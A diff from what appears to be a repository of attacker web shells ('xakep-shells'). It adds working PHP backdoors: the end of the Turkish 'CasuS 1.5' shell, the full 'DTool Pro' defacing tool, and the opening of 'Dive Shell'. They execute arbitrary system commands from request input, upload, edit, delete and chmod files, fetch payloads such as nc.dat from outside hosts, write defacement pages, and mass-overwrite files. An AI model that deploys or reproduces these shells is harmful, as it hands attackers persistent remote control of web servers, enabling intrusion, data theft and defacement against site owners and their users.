<font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
|
||||
<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
|
||||
|
||||
if(!isset($dir)){
|
||||
$dir="$default";
|
||||
}
|
||||
echo "<input type=text size=60 name=dir value='$dir'>
|
||||
<input type=submit value='GIT'><br>
|
||||
</form>
|
||||
</div>";
|
||||
|
||||
if ($op=='wshell'){
|
||||
echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
|
||||
if (isset($ok)){
|
||||
if (empty($kod)){
|
||||
die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
|
||||
}
|
||||
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
|
||||
<br>";
|
||||
echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
|
||||
<br>
|
||||
<br></center></form>";
|
||||
echo "<center><TEXTAREA rows=30 cols=85 readonly>";
|
||||
system("$kod");
|
||||
echo "</TEXTAREA></center>";
|
||||
exit;
|
||||
|
||||
} elseif (empty($ok)){
|
||||
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
|
||||
<br>";
|
||||
echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
|
||||
<br>
|
||||
<br></center></form>";
|
||||
echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
|
||||
exit;
|
||||
}
|
||||
}
|
||||
|
||||
if ($op=='up'){
|
||||
$path=dir;
|
||||
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
|
||||
if(isset($dy)) {
|
||||
|
||||
if(empty($dosya_gonder)){
|
||||
} else {
|
||||
copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
|
||||
}
|
||||
|
||||
if(empty($dosya_gonder2)){
|
||||
} else {
|
||||
copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
|
||||
}
|
||||
|
||||
if(empty($dosya_gonder3)){
|
||||
} else {
|
||||
copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
|
||||
}
|
||||
|
||||
if(empty($dosya_gonder4)){
|
||||
} else {
|
||||
copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
|
||||
}
|
||||
|
||||
} elseif(empty($dy )) {
|
||||
$path=$dir;
|
||||
$dir = $dosya_dizin;
|
||||
echo "$dir";
|
||||
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
|
||||
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
|
||||
echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
|
||||
echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
|
||||
echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
|
||||
|
||||
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
|
||||
echo "</form>";
|
||||
|
||||
|
||||
echo "</html>";
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if($op=='mf'){
|
||||
$path=$dir;
|
||||
if(isset($dismi) && isset($kodlar)){
|
||||
$ydosya="$path/$dismi";
|
||||
if(file_exists("$path/$dismi")){
|
||||
$dos= "Böyle Bir Dosya Vardy Üzerine Yazyldy";
|
||||
} else {
|
||||
$dos = "Dosya Olu?turuldu";
|
||||
}
|
||||
touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
|
||||
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açylamyyor");
|
||||
fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
|
||||
fclose($ydosya2);
|
||||
echo "<center><font color='#0000FF'>$dos</font></center>";
|
||||
} else {
|
||||
|
||||
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
|
||||
echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
|
||||
echo "<br>";
|
||||
echo "<center>KODLAR</center><br>";
|
||||
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
|
||||
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
|
||||
echo "</form>";
|
||||
}
|
||||
}
|
||||
|
||||
if($op=='md'){
|
||||
$path=$dir;
|
||||
if(isset($kismi) && isset($okmf)){
|
||||
$klasör="$path/$kismi";
|
||||
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Olu?turulamyyor</font></center>");
|
||||
echo "<center><font color='#0000FF'>Klasör Olu?turuldu</font></center>";
|
||||
}
|
||||
|
||||
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
|
||||
echo "<center>Klasör Ysmi :<input type='text' name='kismi'></center><br>";
|
||||
echo "<br>";
|
||||
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
|
||||
echo "</form>";
|
||||
}
|
||||
|
||||
|
||||
if($op=='del'){
|
||||
unlink("$fname");
|
||||
}
|
||||
|
||||
|
||||
if($op=='dd'){
|
||||
$dir=$here;
|
||||
$deldirs=$yol;
|
||||
if(!file_exists("$deldirs")) {
|
||||
echo "<font color=\"#ff0000\">Dosya Yok</font>";
|
||||
} else {
|
||||
deltree($deldirs);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
if($op=='edit'){
|
||||
$yol=$fname;
|
||||
$yold=$path;
|
||||
if (isset($ok)){
|
||||
$dosya = fopen("$yol", 'w') or die("Dosya Açylamyyor");
|
||||
$metin=$tarea;
|
||||
fwrite($dosya, $metin) or die("Yazylamyyor!");
|
||||
fclose($dosya);
|
||||
echo "<center><font color='#0000FF'Dosya Ba?aryyla Düzenlendi</font></center>";
|
||||
} else {
|
||||
$path=$dir;
|
||||
echo "<center>DÜZENLE: $yol</center>";
|
||||
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açylamyyor</font></center>");
|
||||
$boyut=filesize($yol);
|
||||
$duzen = @fread ($dosya, $boyut);
|
||||
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
|
||||
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
|
||||
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
|
||||
fclose($dosya);
|
||||
$duzen=htmlspecialchars($duzen);
|
||||
echo "</form>";
|
||||
}
|
||||
}
|
||||
|
||||
if($op=='efp2'){
|
||||
$fileperm=base_convert($_POST['fileperm'],8,10);
|
||||
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
|
||||
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
|
||||
}
|
||||
|
||||
if($op=='efp'){
|
||||
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
|
||||
echo "<form method=post action=./$this_file?op=efp2>
|
||||
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
|
||||
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
|
||||
<input name='dir' type='hidden' value='$yol'>
|
||||
<input type='submit' value='TAMAM' class='input'></div><br>
|
||||
</form>";
|
||||
|
||||
}
|
||||
|
||||
|
||||
$path=$dir;
|
||||
if(isset($dir)){
|
||||
if ($dir = @opendir("$dir")) {
|
||||
while (($file = readdir($dir)) !== false) {
|
||||
if($file!="." && $file!=".."){
|
||||
if(is_file("$path/$file")){
|
||||
$disk_space=filesize("$path/$file");
|
||||
$kb=$disk_space/1024;
|
||||
$total_kb = number_format($kb, 2, '.', '');
|
||||
$total_kb2="Kb";
|
||||
|
||||
|
||||
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
|
||||
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
|
||||
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
|
||||
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
|
||||
echo "<br></div>\n";
|
||||
}else{
|
||||
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
|
||||
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
|
||||
echo "<font color='#FFFF00'>$dirperm</font>";
|
||||
echo " <br></div>\n";
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
closedir($dir);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
echo "<center>------------------------------</center>";
|
||||
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
|
||||
echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
|
||||
if(file_exists("B:\\")){
|
||||
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
|
||||
} else {}
|
||||
if(file_exists("C:\\")){
|
||||
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("D:\\")){
|
||||
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("E:\\")){
|
||||
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("F:\\")){
|
||||
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("G:\\")){
|
||||
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("H:\\")){
|
||||
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
|
||||
} else {}
|
||||
|
||||
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
|
||||
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
|
||||
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
|
||||
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
|
||||
echo "<br>";
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
|
||||
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
|
||||
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
|
||||
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Olu?tur</a></font></center>";
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<br>
|
||||
<center>Tüm haklary sahibi MafiABoY'a aittir</center>";
|
||||
?>
|
1127
xakep-shells/PHP/Crystal.php.txt
Normal file
1127
xakep-shells/PHP/Crystal.php.txt
Normal file
File diff suppressed because it is too large
Load diff
198
xakep-shells/PHP/DTool Pro.php.txt
Normal file
198
xakep-shells/PHP/DTool Pro.php.txt
Normal file
|
@ -0,0 +1,198 @@
|
|||
<?php
|
||||
|
||||
if(empty($chdir)) $chdir = @$_GET['chdir'];
|
||||
if(empty($cmd)) $cmd = @$_GET['cmd'];
|
||||
if(empty($fu)) $fu = @$_GET['fu'];
|
||||
if(empty($list)) $list = @$_GET['list'];
|
||||
|
||||
if(empty($chdir) or $chdir=='') $chdir=getcwd();
|
||||
$cmd = stripslashes(trim($cmd));
|
||||
|
||||
|
||||
//CHDIR tool
|
||||
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
|
||||
$boom = explode(" ",$cmd,2);
|
||||
$boom2 = explode(";",$boom['1'], 2);
|
||||
$toDir = $boom2['0'];
|
||||
|
||||
if($boom['1']=="/")$chdir="";
|
||||
else if(strpos($cmd, 'chdir ..')!==false){
|
||||
$cadaDir = array_reverse(explode("/",$chdir));
|
||||
|
||||
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
|
||||
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
|
||||
$toDir = str_replace($lastDir,"",$chdir);
|
||||
if($toDir=="/")$chdir="";
|
||||
}
|
||||
else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
|
||||
else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
|
||||
|
||||
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
|
||||
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
|
||||
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
|
||||
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
|
||||
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
|
||||
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
|
||||
}
|
||||
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
|
||||
$cmdShow = $cmd;
|
||||
|
||||
//To keep the changes in the url, when using the 'GET' way to send php variables
|
||||
if(empty($post)){
|
||||
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
|
||||
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
|
||||
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
|
||||
}
|
||||
|
||||
//INFO table (pro and normal)
|
||||
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
|
||||
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
|
||||
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
|
||||
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
|
||||
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
|
||||
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
|
||||
$safe = @ini_get($safemode);
|
||||
if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
|
||||
$pro8 = "<i>PHP </i>".phpversion();
|
||||
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
|
||||
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
|
||||
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
|
||||
|
||||
//Turns the 'ls' command more usefull, showing it as it looks in the shell
|
||||
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
|
||||
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
|
||||
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
|
||||
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
|
||||
else if($cmd=='ls') $cmd = "ls -F";
|
||||
|
||||
//If there are some '//' in the cmd, its now removed
|
||||
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
|
||||
?>
|
||||
<body onload="focar();">
|
||||
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
|
||||
.infop{font-family: verdana; font-size: 10px; color:#000000;}
|
||||
.infod{font-family: verdana; font-size: 10px; color:#414978;}
|
||||
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
|
||||
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
|
||||
<script>
|
||||
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
|
||||
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
|
||||
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
|
||||
function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
|
||||
function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
|
||||
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
|
||||
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
|
||||
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
|
||||
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
|
||||
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
|
||||
</script>
|
||||
<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
|
||||
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
|
||||
<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
|
||||
</b></div></td></tr>
|
||||
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
|
||||
<?php
|
||||
$uname = @posix_uname();
|
||||
while (list($info, $value) = each ($uname)) { ?>
|
||||
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
|
||||
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
|
||||
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
|
||||
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
|
||||
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
|
||||
<? if($chdir!=getcwd()){?>
|
||||
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
|
||||
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
|
||||
</DIV></TD></TR></TABLE></td></tr>
|
||||
<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
|
||||
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
|
||||
<td width="75"><DIV class="algod">command</DIV></td>
|
||||
<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
|
||||
<script>
|
||||
function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
|
||||
</script>
|
||||
</td></tr></table><table><tr><td>
|
||||
<?php
|
||||
ob_start();
|
||||
if(isset($chdir)) @chdir($chdir);
|
||||
function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
|
||||
function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
|
||||
function shell($what){echo(shell_exec($what));}
|
||||
function popenn($what){
|
||||
$handle=popen("$what", "r");
|
||||
$out=@fread($handle, 2096);
|
||||
echo $out;
|
||||
@pclose($handle);
|
||||
}
|
||||
function execc($what){
|
||||
exec("$what",$array_out);
|
||||
$out=implode("\n",$array_out);
|
||||
echo $out;
|
||||
}
|
||||
function procc($what){
|
||||
//na sequencia: stdin, stdout, sterr
|
||||
if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
|
||||
$process = @proc_open("$what",$descpec,$pipes);
|
||||
if (is_resource($process)) {
|
||||
fwrite($pipes[0], "");
|
||||
fclose($pipes[0]);
|
||||
|
||||
while(!feof($pipes[2])) {
|
||||
$erro_retorno = fgets($pipes[2], 4096);
|
||||
if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
|
||||
}
|
||||
fclose($pipes[2]);
|
||||
|
||||
while(!feof($pipes[1])) {
|
||||
echo fgets($pipes[1], 4096);
|
||||
}
|
||||
fclose($pipes[1]);
|
||||
|
||||
$ok_p_fecha = @proc_close($process);
|
||||
}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
|
||||
}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
|
||||
}
|
||||
|
||||
$funE="function_exists";
|
||||
if($safe){$fe="safemode";$feshow=$fe;}
|
||||
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
|
||||
elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
|
||||
elseif($funE('system')){$fe="system";$feshow=$fe;}
|
||||
elseif($funE('exec')){$fe="execc";$feshow="exec";}
|
||||
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
|
||||
elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
|
||||
else {$fe="nofunction";$feshow=$fe;}
|
||||
if($fu!="0" or !empty($fu)){
|
||||
if($fu==1){$fe="passthru";$feshow=$fe;}
|
||||
if($fu==2){$fe="system";$feshow=$fe;}
|
||||
if($fu==3){$fe="execc";$feshow="exec";}
|
||||
if($fu==4){$fe="popenn";$feshow="popen";}
|
||||
if($fu==5){$fe="shell";$feshow="shell_exec";}
|
||||
if($fu==6){$fe="procc";$feshow="proc_open";}
|
||||
}
|
||||
$fe("$cmd 2>&1");
|
||||
$output=ob_get_contents();ob_end_clean();
|
||||
?>
|
||||
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
|
||||
<option><?="using $feshow()";?>
|
||||
<option value="1">use passthru()
|
||||
<option value="2">use system()
|
||||
<option value="3">use exec()
|
||||
<option value="4">use popen()
|
||||
<option value="5">use shell_exec()
|
||||
<option value="6">use proc_open()*new
|
||||
<option value="0">auto detect (default)
|
||||
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
|
||||
<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
|
||||
</tr></table></td></tr></table></form></td></tr>
|
||||
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
|
||||
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
|
||||
<?php
|
||||
echo $ch_msg;
|
||||
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
|
||||
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
|
||||
?></TEXTAREA><BR></td></tr>
|
||||
<?php
|
||||
if($list=="1") @include($remote_addr."flist".$format_addr);
|
||||
?>
|
||||
</table>
|
||||
|
187
xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt
Normal file
187
xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt
Normal file
|
@ -0,0 +1,187 @@
|
|||
<?php
|
||||
|
||||
/*Emperor Hacking TEAM */
|
||||
session_start();
|
||||
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
|
||||
$_SESSION['cwd'] = getcwd();
|
||||
$_SESSION['history'] = array();
|
||||
$_SESSION['output'] = '';
|
||||
}
|
||||
|
||||
